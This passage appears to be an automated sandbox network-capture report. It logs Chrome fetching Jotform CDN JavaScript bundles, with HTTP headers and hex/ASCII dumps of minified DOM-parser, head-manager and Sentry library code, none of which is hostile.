                                                                                                                                                                                                                                            Data Ascii: ient","textPath"].map((function(e){return[e.toLowerCase(),e]}))),t.attributeNames=new Map(["definitionURL","attributeName","attributeType","baseFrequency","baseProfile","calcMode","clipPathUnits","diffuseConstant","edgeMode","filterUnits","glyphRef","grad
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 69 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 72 29 3b 69 26 26 21 28 22 67 65 74 22 69 6e 20 69 3f 21 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3a 69 2e 77 72 69 74 61 62 6c 65 7c 7c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 29 7c 7c 28 69 3d 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 5b 72 5d 7d 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2c 69 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6e 29 7b 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 72 29 2c 65 5b 6e 5d 3d 74 5b 72 5d 7d 29 2c 73 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 73 65 74 4d 6f 64 75 6c 65 44 65 66 61 75 6c 74 7c
                                                                                                                                                                                                                                            Data Ascii: i=Object.getOwnPropertyDescriptor(t,r);i&&!("get"in i?!t.__esModule:i.writable||i.configurable)||(i={enumerable:!0,get:function(){return t[r]}}),Object.defineProperty(e,n,i)}:function(e,t,r,n){void 0===n&&(n=r),e[n]=t[r]}),s=this&&this.__setModuleDefault|
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 20 61 2e 53 63 72 69 70 74 3a 63 61 73 65 20 61 2e 53 74 79 6c 65 3a 63 61 73 65 20 61 2e 54 61 67 3a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3b 22 66 6f 72 65 69 67 6e 22 3d 3d 3d 74 2e 78 6d 6c 4d 6f 64 65 26 26 28 65 2e 6e 61 6d 65 3d 6e 75 6c 6c 21 3d 3d 28 72 3d 6c 2e 65 6c 65 6d 65 6e 74 4e 61 6d 65 73 2e 67 65 74 28 65 2e 6e 61 6d 65 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 72 3f 72 3a 65 2e 6e 61 6d 65 2c 65 2e 70 61 72 65 6e 74 26 26 6d 2e 68 61 73 28 65 2e 70 61 72 65 6e 74 2e 6e 61 6d 65 29 26 26 28 74 3d 6e 28 6e 28 7b 7d 2c 74 29 2c 7b 78 6d 6c 4d 6f 64 65 3a 21 31 7d 29 29 29 3b 21 74 2e 78 6d 6c 4d 6f 64 65 26 26 67 2e 68 61 73 28 65 2e 6e 61 6d 65 29 26 26 28 74 3d 6e 28 6e 28 7b 7d 2c 74 29 2c 7b 78 6d
                                                                                                                                                                                                                                            Data Ascii: a.Script:case a.Style:case a.Tag:return function(e,t){var r;"foreign"===t.xmlMode&&(e.name=null!==(r=l.elementNames.get(e.name))&&void 0!==r?r:e.name,e.parent&&m.has(e.parent.name)&&(t=n(n({},t),{xmlMode:!1})));!t.xmlMode&&g.has(e.name)&&(t=n(n({},t),{xm
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 29 2c 67 3d 6e 65 77 20 53 65 74 28 5b 22 73 76 67 22 2c 22 6d 61 74 68 22 5d 29 7d 2c 31 31 38 35 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 44 6f 63 74 79 70 65 3d 74 2e 43 44 41 54 41 3d 74 2e 54 61 67 3d 74 2e 53 74 79 6c 65 3d 74 2e 53 63 72 69 70 74 3d 74 2e 43 6f 6d 6d 65 6e 74 3d 74 2e 44 69 72 65 63 74 69 76 65 3d 74 2e 54 65 78 74 3d 74 2e 52 6f 6f 74 3d 74 2e 69 73 54 61 67 3d 74 2e 45 6c 65 6d 65 6e 74 54 79 70 65 3d 76 6f 69 64 20 30 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 6f 6f 74 3d 22 72 6f 6f 74 22 2c 65 2e 54 65 78 74
                                                                                                                                                                                                                                            Data Ascii: ),g=new Set(["svg","math"])},11852:function(e,t){"use strict";var r;Object.defineProperty(t,"__esModule",{value:!0}),t.Doctype=t.CDATA=t.Tag=t.Style=t.Script=t.Comment=t.Directive=t.Text=t.Root=t.isTag=t.ElementType=void 0,function(e){e.Root="root",e.Text
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 69 73 2e 64 6f 6d 29 2c 74 68 69 73 2e 64 6f 6e 65 3d 21 31 2c 74 68 69 73 2e 74 61 67 53 74 61 63 6b 3d 5b 74 68 69 73 2e 72 6f 6f 74 5d 2c 74 68 69 73 2e 6c 61 73 74 4e 6f 64 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 70 61 72 73 65 72 3d 6e 75 6c 6c 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 72 3d 74 2c 74 3d 61 29 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 74 3d 65 2c 65 3d 76 6f 69 64 20 30 29 2c 74 68 69 73 2e 63 61 6c 6c 62 61 63 6b 3d 6e 75 6c 6c 21 3d 65 3f 65 3a 6e 75 6c 6c 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 6e 75 6c 6c 21 3d 74 3f 74 3a 61 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 43 42 3d 6e 75 6c 6c 21 3d 72 3f 72 3a 6e 75 6c 6c 7d 72 65 74 75 72 6e 20 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e
                                                                                                                                                                                                                                            Data Ascii: is.dom),this.done=!1,this.tagStack=[this.root],this.lastNode=null,this.parser=null,"function"==typeof t&&(r=t,t=a),"object"==typeof e&&(t=e,e=void 0),this.callback=null!=e?e:null,this.options=null!=t?t:a,this.elementCB=null!=r?r:null}return e.prototype.on


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            53192.168.2.1749766104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC560OUTGET /s/portal/674ac14411e/static/js/7988.f937c1ff.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:15 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 16274
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:17 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "d51f0731454569bc55a8e97325173207"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 277
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb62d7f4d434a-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC941INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 37 39 38 38 2e 66 39 33 37 63 31 66 66 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64
                                                                                                                                                                                                                                            Data Ascii: /*! For license information please see 7988.f937c1ff.js.LICENSE.txt */!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugId
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 5b 65 5d 3d 65 7d 29 29 2c 22 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 22 3d 3d 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 72 29 29 2e 6a 6f 69 6e 28 22 22 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 28 29 3f 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 29 7b 66 6f 72 28 76 61 72 20 69 2c 61 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 6e 75 6c 6c 3d 3d 65 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 20 63 61 6e 6e 6f 74 20 62 65 20 63 61 6c 6c 65 64 20 77 69 74 68 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 72
                                                                                                                                                                                                                                            Data Ascii: (function(e){r[e]=e})),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},r)).join("")}catch(e){return!1}}()?Object.assign:function(e,o){for(var i,a,u=function(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");r
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 65 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 65 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 2c 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72
                                                                                                                                                                                                                                            Data Ascii: on"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},F=function(){function e(e,t){for(var n=0;n<t.length;n++){var
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 76 2e 42 41 53 45 5d 7d 29 29 2e 72 65 76 65 72 73 65 28 29 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 69 66 28 21 74 2e 6c 65 6e 67 74 68 29 66 6f 72 28 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6e 29 2c 6f 3d 30 3b 6f 3c 72 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 7b 76 61 72 20 69 3d 72 5b 6f 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 69 66 28 2d 31 21 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 69 29 26 26 6e 5b 69 5d 29 72 65 74 75 72 6e 20 74 2e 63 6f 6e 63 61 74 28 6e 29 7d 72 65 74 75 72 6e 20 74 7d 29 2c 5b 5d 29 7d 2c 4a 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 7b 7d 3b 72 65 74 75 72 6e 20 6e 2e 66 69 6c 74 65 72 28 28
                                                                                                                                                                                                                                            Data Ascii: ((function(e){return e[v.BASE]})).reverse().reduce((function(t,n){if(!t.length)for(var r=Object.keys(n),o=0;o<r.length;o++){var i=r[o].toLowerCase();if(-1!==e.indexOf(i)&&n[i])return t.concat(n)}return t}),[])},J=function(e,t,n){var r={};return n.filter((
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7c 7c 77 69 6e 64 6f 77 2e 6d 6f 7a 52 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7c 7c 56 3a 6e 2e 67 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7c 7c 56 2c 65 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 2e 63 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7c 7c 77 69 6e 64 6f 77 2e 77 65 62 6b 69 74 43 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7c 7c 77 69 6e 64 6f 77 2e 6d 6f 7a 43 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7c 7c 58 3a 6e 2e 67 2e 63 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7c 7c 58 2c 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74
                                                                                                                                                                                                                                            Data Ascii: tAnimationFrame||window.mozRequestAnimationFrame||V:n.g.requestAnimationFrame||V,ee="undefined"!=typeof window?window.cancelAnimationFrame||window.webkitCancelAnimationFrame||window.mozCancelAnimationFrame||X:n.g.cancelAnimationFrame||X,te=function(e){ret
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 6e 67 74 68 3f 6e 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 55 29 3a 6e 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 55 29 21 3d 3d 61 2e 6a 6f 69 6e 28 22 2c 22 29 26 26 6e 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 55 2c 61 2e 6a 6f 69 6e 28 22 2c 22 29 29 7d 7d 2c 75 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 7c 7c 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 76 2e 48 45 41 44 29 2c 72 3d 6e 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 2b 22 5b 22 2b 55 2b 22 5d 22 29 2c 6f 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 72 29 2c 69 3d 5b 5d 2c 61 3d 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 6c 65 6e
                                                                                                                                                                                                                                            Data Ascii: ngth?n.removeAttribute(U):n.getAttribute(U)!==a.join(",")&&n.setAttribute(U,a.join(","))}},ue=function(e,t){var n=document.head||document.querySelector(v.HEAD),r=n.querySelectorAll(e+"["+U+"]"),o=Array.prototype.slice.call(r),i=[],a=void 0;return t&&t.len
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 3c 22 2b 65 2b 22 20 22 2b 55 2b 27 3d 22 74 72 75 65 22 3e 27 2b 4b 28 69 2c 72 29 2b 22 3c 2f 22 2b 65 2b 22 3e 22 7d 28 65 2c 74 2e 74 69 74 6c 65 2c 74 2e 74 69 74 6c 65 41 74 74 72 69 62 75 74 65 73 2c 6e 29 7d 7d 3b 63 61 73 65 20 62 3a 63 61 73 65 20 6d 3a 72 65 74 75 72 6e 7b 74 6f 43 6f 6d 70 6f 6e 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 65 28 74 29 7d 2c 74 6f 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 65 28 74 29 7d 7d 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 7b 74 6f 43 6f 6d 70 6f 6e 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 76
                                                                                                                                                                                                                                            Data Ascii: <"+e+" "+U+'="true">'+K(i,r)+"</"+e+">"}(e,t.title,t.titleAttributes,n)}};case b:case m:return{toComponent:function(){return se(t)},toString:function(){return ce(t)}};default:return{toComponent:function(){return function(e,t){return t.map((function(t,n){v
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 6c 41 74 74 72 69 62 75 74 65 73 3a 5a 28 6d 2c 65 29 2c 6c 69 6e 6b 54 61 67 73 3a 4a 28 76 2e 4c 49 4e 4b 2c 5b 50 2c 4f 5d 2c 65 29 2c 6d 65 74 61 54 61 67 73 3a 4a 28 76 2e 4d 45 54 41 2c 5b 53 2c 67 2c 43 2c 6a 2c 45 5d 2c 65 29 2c 6e 6f 73 63 72 69 70 74 54 61 67 73 3a 4a 28 76 2e 4e 4f 53 43 52 49 50 54 2c 5b 41 5d 2c 65 29 2c 6f 6e 43 68 61 6e 67 65 43 6c 69 65 6e 74 53 74 61 74 65 3a 7a 28 65 29 2c 73 63 72 69 70 74 54 61 67 73 3a 4a 28 76 2e 53 43 52 49 50 54 2c 5b 49 2c 41 5d 2c 65 29 2c 73 74 79 6c 65 54 61 67 73 3a 4a 28 76 2e 53 54 59 4c 45 2c 5b 77 5d 2c 65 29 2c 74 69 74 6c 65 3a 57 28 65 29 2c 74 69 74 6c 65 41 74 74 72 69 62 75 74 65 73 3a 5a 28 54 2c 65 29 7d 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 65 26 26 65 65 28 6e 65 29
                                                                                                                                                                                                                                            Data Ascii: lAttributes:Z(m,e),linkTags:J(v.LINK,[P,O],e),metaTags:J(v.META,[S,g,C,j,E],e),noscriptTags:J(v.NOSCRIPT,[A],e),onChangeClientState:z(e),scriptTags:J(v.SCRIPT,[I,A],e),styleTags:J(v.STYLE,[w],e),title:W(e),titleAttributes:Z(T,e)}}),(function(e){ne&&ee(ne)
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 22 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6c 61 74 74 65 6e 41 72 72 61 79 54 79 70 65 43 68 69 6c 64 72 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 65 2e 63 68 69 6c 64 2c 72 3d 65 2e 61 72 72 61 79 54 79 70 65 43 68 69 6c 64 72 65 6e 2c 6f 3d 65 2e 6e 65 77 43 68 69 6c 64 50 72 6f 70 73 2c 69 3d 65 2e 6e 65 73 74 65 64 43 68 69 6c 64 72 65 6e 3b 72 65 74 75 72 6e 20 59 28 7b 7d 2c 72 2c 28 28 74 3d 7b 7d 29 5b 6e 2e 74 79 70 65 5d 3d 5b 5d 2e 63 6f 6e 63 61 74 28 72 5b 6e 2e 74 79 70 65 5d 7c 7c 5b 5d 2c 5b 59 28 7b 7d 2c 6f 2c 74 68 69 73 2e 6d 61 70 4e 65 73 74 65 64 43 68 69 6c 64 72 65 6e 54 6f 50 72 6f 70 73 28 6e 2c 69 29 29 5d 29 2c 74 29 29 7d 2c 74 2e 70
                                                                                                                                                                                                                                            Data Ascii: r more information.")},t.prototype.flattenArrayTypeChildren=function(e){var t,n=e.child,r=e.arrayTypeChildren,o=e.newChildProps,i=e.nestedChildren;return Y({},r,((t={})[n.type]=[].concat(r[n.type]||[],[Y({},o,this.mapNestedChildrenToProps(n,i))]),t))},t.p
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 72 65 6e 28 7b 63 68 69 6c 64 3a 65 2c 6e 65 77 50 72 6f 70 73 3a 74 2c 6e 65 77 43 68 69 6c 64 50 72 6f 70 73 3a 61 2c 6e 65 73 74 65 64 43 68 69 6c 64 72 65 6e 3a 69 7d 29 7d 7d 7d 29 29 2c 74 3d 74 68 69 73 2e 6d 61 70 41 72 72 61 79 54 79 70 65 43 68 69 6c 64 72 65 6e 54 6f 50 72 6f 70 73 28 72 2c 74 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6e 64 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 70 72 6f 70 73 2c 74 3d 65 2e 63 68 69 6c 64 72 65 6e 2c 6e 3d 42 28 65 2c 5b 22 63 68 69 6c 64 72 65 6e 22 5d 29 2c 72 3d 59 28 7b 7d 2c 6e 29 3b 72 65 74 75 72 6e 20 74 26 26 28 72 3d 74 68 69 73 2e 6d 61 70 43 68 69 6c 64 72 65 6e 54 6f 50 72 6f 70 73 28 74 2c 72 29 29 2c 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f
                                                                                                                                                                                                                                            Data Ascii: ren({child:e,newProps:t,newChildProps:a,nestedChildren:i})}}})),t=this.mapArrayTypeChildrenToProps(r,t)},t.prototype.render=function(){var e=this.props,t=e.children,n=B(e,["children"]),r=Y({},n);return t&&(r=this.mapChildrenToProps(t,r)),d.createElement(o


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            54192.168.2.1749764104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC560OUTGET /s/portal/674ac14411e/static/js/8508.337c9fc2.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:15 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 49207
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:17 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "b57ee8a7b5bda7f4801df3eeaedaa9b0"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 277
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb62d6b920f6c-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC941INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 36 66 62 62 30 62 35 30 2d 39 63 35 39 2d 35 66 61 31 2d 39 31 32 63 2d 61 63 66 64 66 32
                                                                                                                                                                                                                                            Data Ascii: "use strict";!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="6fbb0b50-9c59-5fa1-912c-acfdf2
